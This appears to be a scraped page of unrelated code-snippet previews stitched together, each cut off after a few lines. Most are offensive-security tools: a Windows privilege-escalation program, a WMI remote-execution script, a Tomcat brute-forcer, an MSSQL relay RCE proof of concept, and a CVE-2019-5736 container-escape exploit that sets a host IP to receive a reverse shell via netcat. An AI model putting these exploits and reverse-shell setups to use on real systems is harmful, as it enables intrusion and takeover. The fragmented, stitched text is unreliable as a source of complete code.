Talks videos 🎬 Watch here
- Acquisitions https://acquiredby.co/apple-acquisitions/
Talks videos 🎬 Watch here
# with user-agent | |
# credits @fo0_ | |
wordgrab() { | |
url=$1 | |
tmpfile="$(date "+%s")" | |
curl -sLk -m 3 -A "Mozilla/5.0 (X11; Linux; rv:74.0) Gecko/20100101 Firefox/74.0" https://$url | html2text | egrep -io "[0-9a-zA-Z\-]+" | tr '[:upper:]' '[:lower:]' | sed -r "s/^[^a-z]+//g" | sed -r "s/[^a-z0-9]+$//g" | sort -fu | tee -a $tmpfile | tr '-' '.' | tee -a $tmpfile | tr "." "\n" >> $tmpfile | |
cat $tmpfile | sort -fu | |
rm $tmpfile | |
} |
using System; | |
using System.Diagnostics; | |
using System.Runtime.InteropServices; | |
using System.Security.Principal; | |
namespace GetSystem | |
{ | |
class Program | |
{ |
I spent the weekend meeting hackers in Vegas, and I got talking to one of them about CRLF Injection. They'd not seen many CRLF Injection vulnerabilities in the wild, so I thought I'd write up an example that's similar to something I found a few months ago.
If you're looking for bugs legally through a program like hackerone, or you're a programmer wanting to write secure PHP: this might be useful to you.
#!/usr/bin/env python | |
# SECUREAUTH LABS. Copyright 2018 SecureAuth Corporation. All rights reserved. | |
# | |
# This software is provided under under a slightly modified version | |
# of the Apache Software License. See the accompanying LICENSE file | |
# for more information. | |
# | |
# A similar approach to smbexec but executing commands through WMI. | |
# Main advantage here is it runs under the user (has to be Admin) | |
# account, not SYSTEM, plus, it doesn't generate noisy messages |
0-00.usa.cc | |
0-mail.com | |
001.igg.biz | |
0039.cf | |
0039.ga | |
0039.gq | |
0039.ml | |
027168.com | |
0317123.cn | |
0815.ru |
""" | |
Tomcat bruteforce | |
Author: @itsecurityco | |
""" | |
import os | |
import sys | |
import getopt | |
import base64 | |
import requests |
<?php | |
$infile = 'austria.csv'; | |
$outfile = 'austria.ips'; | |
$fp = fopen($outfile,'w'); | |
$handle = fopen($infile, "r"); | |
if ($handle) | |
{ | |
while (($line = fgets($handle)) !== false) { | |
$line = trim($line); |
#!/bin/python3 | |
# Silly PoC for CVE-2019-5736 in Python by @singe (with help from @_staaldraad, @frichette_n & @_cablethief) | |
# Target will need a python3 interpreter | |
# Edit IP info below, on the host run a netcat to catch the reverse shell | |
# Run this python file in the container | |
# Then from the host: docker exec -i <container name> /tmp/evil | |
import os | |
import stat | |
host='172.17.0.1' |
#!/usr/bin/env python | |
# for more info: https://shenaniganslabs.io/2019/01/28/Wagging-the-Dog.html | |
# this is a rough PoC | |
# requirements for RCE: | |
# - the attacker needs to either have or create an object with a service principal name | |
# - the MSSQL server has to be running under the context of System/Network Service/a virtual account | |
# - the MSSQL server has the WebClient service installed and running (not default on Windows Server hosts) | |
# - NTLM has to be in use |